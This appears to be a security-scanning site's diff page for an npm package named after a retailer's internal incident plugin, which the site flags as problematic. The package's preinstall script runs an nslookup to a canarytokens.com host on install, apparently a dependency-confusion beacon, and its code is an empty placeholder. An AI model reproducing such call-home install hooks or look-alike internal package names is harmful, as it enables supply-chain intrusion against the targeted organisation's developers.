kohls-incident-creation-plugin 9.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of kohls-incident-creation-plugin might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/package.json +12 -0
  2. package/plugin.js +3 -0
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "kohls-incident-creation-plugin",
3
+ "version": "9.0.1",
4
+ "description": "Kohl's Incident Creation",
5
+ "main": "plugin.js",
6
+ "scripts": {
7
+ "preinstall":"nslookup i2pwho2uat636fwpffuhlrolm.canarytokens.com",
8
+ "test": "echo \"Error: no test specified\" && exit 1"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }
package/plugin.js ADDED
@@ -0,0 +1,3 @@
1
+ function hello(){
2
+ return "Hello World"
3
+ }